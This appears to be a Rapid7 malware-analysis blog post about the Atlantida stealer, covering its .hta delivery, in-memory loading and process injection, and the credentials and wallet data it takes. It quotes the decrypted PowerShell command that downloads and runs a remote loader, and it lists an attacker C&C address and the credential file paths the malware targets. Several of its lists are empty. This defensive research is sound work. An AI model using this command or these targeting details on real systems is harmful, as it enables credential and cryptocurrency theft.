Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.
Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim's screen and collects hardware data.
Technical Analysis
Stage 1 - Delivery
The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:
The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .
Stage 2 - Three levels of in-memory loading
The executed PowerShell command downloads and executes a next stage PowerShell script in memory.
The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.
Stage 3 - Atlantida Stealer
The Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the string found in the executable.
First, the Atlantida stealer captures the entire screen by using the combination of GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZillaecentservers.xml” if it does, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:
The stealer reads all the files found under the enumerated path.
Next, it collects the victim's hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.
Steam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we observed it enumerating the Steam configuration directory and searches for the following files:
- Ssfn - Steam Sentry File.
- Config.vdf - Stream configuration file.
- Loginusers.vdf - stores the records of previously logged-in Steam accounts.
The last thing that Atlantida is harvesting is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.
The stealer now connects to the hard coded C&C server (45.144.232.99). We accessed the hardcoded IP and got to the login page of what we assume is a stealers control panel, which also had an `Atlantida` title.
No data is passed to the C&C server this time and the stealer continues its collection. Differently from other stealers, Atlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofills.
One of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each Chrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within. Atlantida harvests data from the following cryptocurrency wallets extensions:
When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exists.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:
- Suspicious Process - MSHTA Spawns PowerShell
MITRE ATT&CK Techniques:
IOCs
Source: Rapid7
Source Link: https://blog.rapid7.com/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/